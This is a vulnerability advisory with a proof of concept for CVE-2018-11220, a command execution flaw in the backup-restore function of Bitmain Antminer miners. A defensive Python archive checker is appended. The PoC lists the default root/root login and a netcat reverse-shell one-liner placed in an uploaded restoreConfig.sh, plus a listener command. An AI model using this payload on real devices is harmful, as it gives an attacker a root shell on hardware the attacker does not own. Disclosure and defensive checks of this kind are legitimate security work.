Bitmain Antminer D3/L3+/S9 Remote Command Execution

2018.05.28
Credit: CorryL
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution
# Google Dork: N/A
# Date: 27/05/2018
# Exploit Author: Corrado Liotta
# Vendor Homepage: https://www.bitmain.com/
# Software Link: N/A
# Version: Antminer - D3, L3+, S9, and other
# Tested on: Windows/Linux
# CVE : CVE-2018-11220

#Description

The software used by the miners produced by Bitmain (AntMiner) is affected by a remote code execution vulnerability: the "Restore Backup" functionality of the administration portal can be used to execute commands on the system. This allows a malicious user with valid credentials to access the entire file system with administrative privileges.

#POC

Login on Antminer Configuration Portal (Default Credential: root/root)

1) Create a file named: restoreConfig.sh
2) Insert inside:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f

3) Generate archive by inserting the file created before: Exploit.tar
4) Launch netcat and upload file:

nc -vv -l -p port

system --> upgrade --> upload archive
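A defensive pre-restore check, added here as an example and not taken from the advisory or from Bitmain firmware: it inspects an uploaded backup archive without extracting it and reports members that a configuration backup has no reason to contain. It assumes, as the PoC implies, that the restore handler runs a restoreConfig.sh found in the archive; `audit_backup`, `make_tar` and the sample file names and contents are hypothetical.

```python
import io
import tarfile


def audit_backup(data: bytes) -> list[str]:
    """Return findings for a backup archive; an empty list means nothing was flagged."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            name = m.name
            # Absolute paths or ".." components would land outside the restore directory.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append(f"{name}: path escapes the extraction directory")
            if not m.isfile():
                if not m.isdir():
                    findings.append(f"{name}: non-regular member (link or device)")
                continue
            # The PoC script carries no shebang, so the name check matters most.
            if name.lower().endswith(".sh"):
                findings.append(f"{name}: shell script in a configuration backup")
            if m.mode & 0o111:
                findings.append(f"{name}: executable permission bits set")
            if tar.extractfile(m).read(2) == b"#!":
                findings.append(f"{name}: content starts with an interpreter line")
    return findings


def make_tar(files: dict[str, tuple[bytes, int]]) -> bytes:
    """Build an in-memory tar from {name: (content, mode)} for the samples below."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, (content, mode) in files.items():
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(content), mode
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed samples: a plain settings backup, an archive shaped like the one in
# the PoC (harmless placeholder body), and a member with a traversal path.
CLEAN = make_tar({"network.conf": (b"hostname=miner01\n", 0o644)})
SUSPECT = make_tar({"restoreConfig.sh": (b"echo placeholder\n", 0o755)})
TRAVERSAL = make_tar({"../etc/settings.conf": (b"x=1\n", 0o644)})

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("suspect", SUSPECT), ("traversal", TRAVERSAL)):
        print(label, audit_backup(blob))
```

A restore path that rejects any archive with findings, and never executes files taken from the upload, removes the command execution route described above.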

